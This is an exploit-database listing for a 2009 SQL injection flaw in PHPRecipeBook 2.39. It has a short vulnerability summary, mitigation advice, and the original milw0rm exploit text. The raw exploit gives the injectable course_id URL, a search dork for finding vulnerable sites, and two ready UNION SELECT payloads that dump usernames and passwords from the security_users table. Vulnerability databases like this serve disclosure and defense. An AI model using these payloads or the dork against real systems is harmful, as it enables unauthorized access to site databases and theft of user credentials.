header-logo
Suggest Exploit
vendor:
PHPRecipeBook
by:
DarKdewiL
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPRecipeBook
Affected Version From: 2.39
Affected Version To: 2.39
Patch Exists: NO
Related CWE: N/A
CPE: a:phprecipebook:phprecipebook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPRecipeBook Remote SQL Injection Exploit

A remote SQL injection vulnerability exists in PHPRecipeBook 2.39. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'course_id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use the least privileged user account with the least amount of privileges necessary to perform its intended function.
Source

Exploit-DB raw data:

//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK - GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
**********************************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/

[-] Bugs : Remote SQL injection Exploit 
[-] Dork : inurl:"/index.php?m=" "PHPRecipeBook 2.39"
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz

[!] Note : Always use the time you have to finish your work.
  Never leave it to the last minute.
  Once time goes away, it never comes back

**********************************************************************
//////////////////////////////////////////////////////////////////////
**********************************************************************
[-- Bugs --]

(+)

/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]

[-- SQL EXPLOIT --]

Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users--
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users--

# milw0rm.com [2009-03-31]

Navigation

Suggest Exploit

Services By CQR